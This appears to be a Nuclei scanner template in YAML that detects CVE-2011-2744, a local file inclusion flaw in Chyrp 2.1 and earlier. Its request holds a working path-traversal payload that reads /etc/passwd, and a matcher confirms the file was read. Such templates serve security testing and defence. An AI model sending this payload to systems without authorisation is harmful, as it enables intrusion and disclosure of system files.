my-nuclei-templates/CVE-2011-2744.yaml

34 lines
943 B
YAML

id: CVE-2011-2744
info:
name: Chyrp 2.x - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference:
- https://www.exploit-db.com/exploits/35945
- https://www.cvedetails.com/cve/CVE-2011-2744
- http://www.openwall.com/lists/oss-security/2011/07/13/6
- http://secunia.com/advisories/45184
classification:
cve-id: CVE-2011-2744
tags: cve,cve2011,lfi,chyrp
requests:
- method: GET
path:
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/18